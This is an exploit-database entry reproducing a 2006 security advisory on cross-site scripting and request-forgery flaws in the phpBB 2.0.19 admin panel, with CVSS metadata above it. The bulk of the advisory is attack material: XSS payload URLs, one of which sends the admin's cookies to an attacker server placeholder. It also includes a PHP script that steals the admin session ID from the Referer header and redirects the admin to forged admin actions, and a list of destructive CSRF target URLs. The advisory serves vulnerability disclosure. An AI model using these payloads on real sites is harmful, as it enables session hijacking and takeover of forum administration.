Exploitalert - Database of Exploits

phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin

CVE	Category	Price	Severity
CVE-2006-0437	CWE-352	Unknown	High

Author	Risk	Exploitation Type	Date
Not specified	High	Remote	2006-02-15

CVSS	EPSS	EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Attack Requirements	Present	AT	The successful attack depends on the presence of specific deployment and execution conditions of the vulnerable system that enable the attack. These include: A race condition must be won to successfully exploit the vulnerability. The successfulness of the attack is conditioned on execution conditions that are not under full control of the attacker. The attack may need to be launched multiple times against a single target before being successful. Network injection. The attacker must inject themselves into the logical network path between the target and the resource requested by the victim (e.g. vulnerabilities requiring an on-path attacker).
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Confidentiality Impact to the Vulnerable System	High	VC	There is a total loss of confidentiality, resulting in all information within the Vulnerable System being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.
Availability Impact to the Vulnerable System	High	VI	There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the Vulnerable System. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the Vulnerable System.
Availability Impact to the Vulnerable System	High	VA	There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the Vulnerable System; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the Vulnerable System (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).
Subsequent System Confidentiality Impact	Negligible	SC	There is no loss of confidentiality within the Subsequent System or all confidentiality impact is constrained to the Vulnerable System.
Integrity Impact to the Subsequent System	None	SI	There is no loss of integrity within the Subsequent System or all integrity impact is constrained to the Vulnerable System.
Availability Impact to the Subsequent System	None	SA	There is no loss of availibility within the Subsequent System or all availibility impact is constrained to the Vulnerable System.

http://cxsecurity.com/ascii/WLB-2006020016

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 3.2.2006 from SecurityReason.Com CVE-2006-0437 for the XSS issues CVE-2006-0438 for the CSRF issues - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. XSS admin --- In admin/admin_smilies.php you can create, modifcate smille. So nothing special but phpBB don't check what is going to db. case savenew - -448-473--- $smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code']; $smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url'] : $HTTP_GET_VARS['smile_url']; $smile_url = phpbb_ltrim(basename($smile_url), "'"); $smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion']; $smile_code = trim($smile_code); $smile_url = trim($smile_url); $smile_emotion = trim($smile_emotion); // If no code was entered complain ... if ($smile_code == '' || $smile_url == '') { message_die(GENERAL_MESSAGE, $lang['Fields_empty']); } // // Convert < and > to proper htmlentities for parsing. // $smile_code = str_replace('<', '<', $smile_code); $smile_code = str_replace('>', '>', $smile_code); // // Save the data to the smiley table. // $sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon) VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" . str_replace("\'", "''", $smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')"; $result = $db->sql_query($sql); - -448-473--- Only "<" and ">" are restricted. http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c" onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrgreen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN and you have new smile. Ofcourse you can better do exploit. For IE and etc. - --- 2. Cross Site Request Forgeries --- phpBB admin in Administration Panel have SID in url. Ok. Example if you want see user profil or split, lock someone post etc. Like: http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0 http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35 etc. If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then you can create url to script with referer for admin.So when admin open profil the url will be executed. Need be referer in request. Next problem is: 103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|png))$)#is", $avatar_filename) ) in includes/unsercp_avatar.php. Why? Because this preg() don't have limit of chars. In mysql phpbb DB you have (*_users) user_avatar varchar(100) only 100 chars will go to db. So you can post url like http://[HOST]/[DIR]/script.php/[100 chars].jpg Sent: http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg and in db is: http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur or in bbcode (IMG) http://[HOST]/[DIR]/script.php/securityreason.jpg Nothing special.. Ok.. You need create new user (nick name can be "FUCKmeADMIN" etc). And upload one script. Doesn't need be in serverwhere is phpbb. - -script.php-- <?php # SecurityReason.Com writed by Maksymilian Arciemowicz # Example exploit $operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20'; # http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=icon_mrgreen.gif" onmouseover='alert(document.cookie)' $sid=''; preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid); if($sid[1]!=''){ header("Location: ".$operation."&sid=".$sid[1]); } ?> - -script.php-- In this script you need give someone operation. I think, can be: http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20 create new smilie.. and all char a, change to image with javascript (XSS). http://[HOST]/[DIR]/admin/admin_smilies.php?mode=delete&id=63 Delete someone smile. http://[HOST]/[DIR]/admin/admin_words.php?mode=delete&id=1&sid=c1db64124b7ced0668dec5900fed3b35 Delete word censor. http://[HOST]/[DIR]/admin/admin_forums.php?mode=forum_order&move=15&f=4 Change position of forum=4. http://[HOST]/[DIR]/admin/admin_ranks.php?mode=delete&id=4 Delete Rank Administration http://[HOST]/[DIR]/login.php?logout=true Logout etc.. If admin have in url SID and img tag is displaying that this script can get SID form HTTP_REFERER and redirect tooperation for admin (header("Location...")). Admin can't see result. This XSS in Point 1 can you used for this trick. Solution is don't displaying <IMG> tags from user where have you SID in url. And use POST to any operations like create, remove smilies etc. - --- 3. Greets --- sp3x - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFD41JC3Ke13X/fTO4RAhpsAJ46jnHCF0c9RROYPC1T88N9D/iOigCgwKUV 3YyVMR1NFsznOmjVpv6LVAc= =b2mM -----END PGP SIGNATURE-----

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.